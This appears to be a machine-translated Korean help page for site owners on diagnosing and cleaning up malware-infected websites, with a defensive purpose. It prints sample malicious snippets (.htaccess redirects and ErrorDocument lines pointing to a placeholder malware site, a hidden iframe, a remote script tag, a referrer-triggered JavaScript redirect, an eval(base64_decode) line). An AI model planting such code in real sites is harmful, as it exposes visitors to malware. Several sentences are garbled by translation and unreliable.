멀웨어로 해킹됨

멀웨어는 특정 사용자에게 해를 입히도록 특별히 설계된 소프트웨어 또는 모바일 애플리케이션입니다. 컴퓨터, 모바일 장치, 실행 중인 소프트웨어 또는 그 사용자입니다. 멀웨어에 관한 자세한 내용은 멀웨어 및 원치 않는 소프트웨어를 참고하세요.

사이트에 멀웨어가 포함된 경우 일반적으로 사용자에게 경고가 표시됩니다. '이 사이트는 컴퓨터에 문제를 야기할 수 있습니다.'가 검색결과 또는 사용자가 사이트를 방문하려고 할 때 브라우저에 표시되는 중간 페이지 다음과 같습니다.

<ph type="x-smartling-placeholder">
</ph> 대표적인 멀웨어 인터스티셜 페이지
멀웨어 경고가 포함된 검색 결과
를 통해 개인정보처리방침을 정의할 수 있습니다.

전화를 걸고 받기 위해 필요한 사항은 다음과 같습니다.

  • 사이트의 서버(웹, 데이터베이스, 파일 등입니다.
  • 셸 또는 터미널 명령어에 관한 지식
  • 데이터베이스에서 SQL 쿼리를 실행하는 기능

준비

  • Search Console 가입하기 여기 설명된 대로 해킹된 사이트의 소유권을 확인하세요. Search Console은 영향을 받은 페이지의 샘플을 제공하여 . 또한 사이트가 여러 유형의 멀웨어 또는 기타 해킹의 영향을 받은 것으로 감지되었을 때

  • Google 세이프 브라우징 진단 페이지 보기 하여 사이트가 사용자에게 해로울 수 있는지 여부에 대한 공개 정보를 확인합니다. 다음과 비슷한 URL에서 페이지 또는 사이트의 목록 상태를 볼 수 있습니다. https://transparencyreport.google.com/safe-browsing/search?url=***&lt;&lt;page_or_site>>*** 예를 들면 다음과 같습니다. https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    <<page_or_site>>는 특정 페이지 URL (http://example.com/badpage) 또는 전체 사이트 (example.com)

  • 브라우저를 사용하여 사이트의 페이지를 표시하지 않습니다. 악성코드는 종종 멀웨어에 감염된 파일을 열어서 감염된 컴퓨터에서 컴퓨터에 손상을 입힐 수 있습니다. 진단 지침이 예를 들어 브라우저에서 페이지에 직접 액세스하려면 cURL 또는 Wget: HTTP 요청 수행 (예: 페이지 가져오기)

    이렇게 무료로 사용할 수 있는 도구는 리디렉션 진단에 유용하며 리퍼러 또는 사용자 에이전트 정보를 유연하게 포함할 수 있습니다. 특정 리퍼러나 user-agent는 해커를 모방하는 데 도움이 됩니다. 해커는 특정 유형의 사용자에게만 악성 콘텐츠를 보다 많은 '실제 사용자'를 타겟팅하는 user-agent 또는 리퍼러 피하는 것이 사이트 소유자 및 악성코드 스캐너로부터 탐지.

`curl -v --referer "http://www.google.com" <your-url>`

다음은 사용자 에이전트와 리퍼러를 모두 지정하는 예입니다.

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

유무와 관계없이 페이지를 가져오는 것이 좋습니다. --referer "https://www.google.com", 일부 멀웨어만 활성화되기 때문 사용자가 Google 검색 결과에서 유입될 때

  • 이 단계에서부터 문서를 만들어 발견한 사항을 기록합니다. 이 문서는 최소한 손상된 각 파일의 이름과 위치를 포함해야 함 감염된 방법에 대한 메모와 메모를 작성하며, 감염된 위치를 확인하기 위한 사이트 정리 및 유지관리하기

  • 이 페이지의 앞부분에 있는 동영상을 보고 멀웨어가 작동하는 방식과 안전하게 보호할 수 있습니다.

진단

사이트에 영향을 주는 멀웨어 파악:

  1. 보안 문제 보고서를 엽니다. 해 보세요. 멀웨어 경고에 대한 설명을 펼쳐 영향을 받은 페이지의 예시를 확인합니다. 이 목록은 일부 예시일 뿐 모든 내용을 포함하지는 않습니다. 에 대한 예시 페이지가 표시되지 않을 수 있습니다. 모든 유형의 멀웨어를 차단하는 데 사용됩니다.
  2. 예제 페이지에 다음과 같은 유형의 멀웨어가 있는지 테스트합니다.
를 통해 개인정보처리방침을 정의할 수 있습니다.

서버 구성 멀웨어 (원치 않는 리디렉션)

해커가 내 사이트를 해킹한 후 내 사이트에서 방문자를 리디렉션하고 있습니다. 악성코드 공격 사이트로 이동하는 것이 좋습니다. 구성 파일을 참조하세요. 서버 구성 파일은 일반적으로 관리자가 페이지의 특정 페이지나 디렉토리에 대한 URL 리디렉션을 있습니다. 예를 들어 Apache 서버에서는 .htaccess 파일과 httpd.conf입니다.

진단

보안 문제 보고서에 나와 있는 예시 URL을 방문해 봅니다. 응답 '서버 구성'으로 감염된 페이지 감염된 곳은 어디인지 다음 헤더:

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

영향을 받은 파일 확인

셸 또는 터미널 액세스를 통해 서버에 로그인합니다 (사이트가 오프라인 상태일 수 있음). 관련 서버 구성 파일을 검토합니다. 더 많은 동영상이 한 개 이상의 서버 구성 파일을 사용하는 것이 좋습니다. 다음 파일에서 확인 지시어(예: 알 수 없는 사이트로의 리디렉션)가 있습니다. 예를 들어 .htaccess` 파일을 열면 다음과 같은 리디렉션이 표시될 수 있습니다.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

SQL 삽입

해커가 사이트의 데이터베이스를 손상시켰습니다. 예를 들어 해커는 데이터베이스의 모든 기록에 프로그램 방식으로 악성코드를 삽입함 그래야 서버가 서버에서 정보를 필요로 하는 페이지를 로드할 때 이제 악성 코드가 페이지의 콘텐츠에 삽입되어 사이트 방문자에게 피해를 줄 수 있습니다.

진단

  1. 명령줄에서 영향을 받은 URL에 대해 몇 가지 쿼리를 실행하고 SQL 공격 단어에 대한 응답(예: 'iframe') '에발' 등의 단어로 구성됩니다.

  2. 데이터베이스 서버에 로그인하거나 다음과 같은 도구를 통해 데이터베이스를 확인합니다. phpMyAdmin. 만약 문제가 있을 경우 페이지의 출처에서 발견된 손상과 코드를 Wget 또는 cURL을 통해 실제 데이터베이스 항목과 함께 사용합니다. 예를 들어 페이지에 위험한 iframe이 포함되어 있는 경우 검색할 수 있도록 합니다. 예를 들면 다음과 같습니다.

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';

  3. 또한 서버의 데이터베이스 로그와 오류 파일을 확인하여 예기치 않은 SQL 명령과 같이 비정상적인 활동이 오류가 발생할 수 있습니다.

문제 해결

감염된 각 데이터베이스 기록을 업데이트하거나 마지막으로 알려진 데이터베이스를 복원하세요. 백업

코드 삽입

사이트의 페이지가 Google 웹 사이트에 악성 코드를 삽입하도록 iframe과 같은 악성 코드를 도움이 됩니다.

진단

cURL을 사용하여 보안 문제 보고서에 표시된 일부 예시 URL을 방문하거나 의심스러운 코드를 가져와 검사합니다. 삽입된 코드는 다양한 유형을 취할 수 있으며 찾기 어렵습니다. 'iframe'과 같은 단어를 검색하는 것이 도움이 될 수 있습니다. 찾기 iframe 코드를 사용할 수 있습니다. 기타 유용한 키워드에는 'script', 'eval' 및 'unescape'가 있습니다. 대상 예를 들어 모든 파일에서 'iframe'을 검색 (Unix 기반 시스템)

$grep -irn "iframe" ./ | less</pre>

다음은 주의해야 할 일반적인 멀웨어 패턴입니다.

악성 사이트를 로드하는 iframe:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

JavaScript 또는 공격 사이트:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

브라우저를 공격 사이트로 리디렉션하는 스크립트

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

발견되지 않도록 복잡하게 만들어진 악성 코드:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

원래는 무해한 코드에 유해 코드를 무작위로 작성하도록 설계된 공유 개체 파일 스크립트:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

악성 오류 템플릿

404 파일을 찾을 수 없음과 같은 오류 메시지에 사용되는 템플릿이 구성되었습니다. 멀웨어를 유포하는 데 사용됩니다. 공격자는 이러한 방식으로 존재하지 않는 것입니다.

진단

사이트에서 존재하지 않거나 다른 유형의 오류가 발생하는 페이지를 요청합니다. 다른 사이트에서 오는 응답이 있는지 확인하여 해당 응답이 멀웨어가 포함되어 있는 것을 볼 수 있습니다.

문제 해결

웹 서버에 로그인하여 서버 구성 파일에서 오류를 검색합니다. 페이지 지침을 참조하세요. 예를 들어 Apache 웹 서버의 오류 템플릿은 .htaccess 파일에 선언되어 있습니다. 다음은 .htaccess 파일 항목의 예입니다. 는 악성 사이트에서 404 오류 페이지를 검색합니다.

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

사이트를 정리할 준비가 되면 .htaccess 파일을 교체합니다. 또는 컴퓨터에서 원치 않는 ErrorDocument 명령어를 기존 .htaccess 파일 또한 오류가 발생한 경우 실제 오류 파일을 정리해야 확인할 수 있습니다 마지막으로 웹 서버를 다시 시작하여 변경사항이 적용됩니다

보안이 침해되었거나 악성 사이트에서 로드되는 리소스 {compromised-resources}

사이트에서 다음을 포함하는 것으로 알려진 웹사이트의 콘텐츠나 리소스를 사용합니다. 있습니다. 자바스크립트 파일, 이미지 또는 기타 파일일 수 있습니다. 이로 인해 사이트가 다른 사이트

진단

보안 문제 보고서에 나와 있는 예시 URL을 방문해 봅니다.

문제 해결

  1. Search Console의 보안 문제 보고서 그러면 브라우저 경고가 표시됩니다.
  2. 브라우저 경고는 의심스러운 콘텐츠의 도메인을 알려줍니다. 브라우저 경고에 나열된 신고 사이트에 대한 모든 참조를 삭제하세요. 신고된 사이트의 콘텐츠가 알지 못하는 사이에 포함되는 경우 문제가 더 심각할 수 있습니다 사이트가 해킹당했을 가능성이 높으며 에서 사이트에 다른 해킹 및 취약성이 있는지 지속적으로 검토해야 합니다.
  3. Google의 개인 정보 보호 정책이 아닌 콘텐츠가 신고되면 해당 콘텐츠를 다시 포함하고자 할 때 제거된 후에는 Google 세이프 브라우징 진단 페이지 해당 사이트 (http://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external}의 지원 요청 합법적인 사이트의 소유자는 일반적으로 이러한 사이트를 신속하게 정리합니다.

추가 조사

그런 다음 시스템에 추가 악성 파일이나 변경사항이 있는지 확인합니다. 이 해커가 기존 페이지나 데이터베이스 레코드를 수정하여 완전히 생성되었을 수 있음 새 스팸 페이지, 안전한 페이지에 스팸을 표시하는 작성된 함수, 또는 "백도어" 해커가 사이트에 다시 들어오도록 허용하거나 제거했는지 확인합니다.

사이트가 온라인 상태인 경우 조사를 위해 오프라인으로 전환하는 것이 좋습니다.

사이트에 대한 안전한 백업이 있는 경우 어떤 파일이 백업되었는지 확인합니다. 백업 후 생성 또는 수정된 버전을 확인하고 조사하세요. Unix 기반 다음과 같은 명령어를 사용하여 새 파일을 찾을 수 있습니다.

diff -qr <current-directory> <backup-directory>

예를 들면 다음과 같습니다.

diff -qr www/ backups/full-backup-20120124/

기타:

md5sum <current-page> <backup-page>

예를 들면 다음과 같습니다.

md5sum www/page.html backups/full-backup-20120124/page.html

서버, 액세스, 오류 로그에서 다음과 같은 의심스러운 활동이 있는지 확인합니다. 로그인 시도 실패, 명령 기록 (특히 루트) 및 알 수 없는 사용자 계정 해커가 이러한 로그를 변경했을 수도 있습니다. 사용할 수 있습니다. 에 대한 동영상에 몇 가지 예시가 나와 있습니다. 취약점을 파악합니다.

구성 파일에서 리디렉션을 확인합니다. 구성 파일은 일반적으로 .htaccesshttpd.conf로 명명됩니다. 해커는 종종 사용자 에이전트, 시간 또는 리퍼러를 기준으로 리디렉션합니다. 필요한 경우 구성 파일을 업데이트하려면 해당 구성 파일을 위해 서버를 다시 시작해야 할 수도 변경사항을 적용합니다.

폴더 및 파일 권한이 지나치게 관대한지 확인합니다. 해커는 사이트 소유자가 관대한 권한을 감지하지 못하면 해커가 사이트에 다시 들어올 수 있는 방법이 있습니다. 파일이 다음을 초과하는 경우: 644 (rw-r--r--)755 (rwxr-xr-x)보다 큰 폴더는 보안이 취약할 수 있습니다. 있습니다 더 느슨한 권한이 실제로 필요한지 확인합니다. 사용 설정됨 Unix 기반 시스템의 경우 다음 명령을 실행합니다.

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

및:

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

데이터베이스가 있는 경우 phpMyAdmin.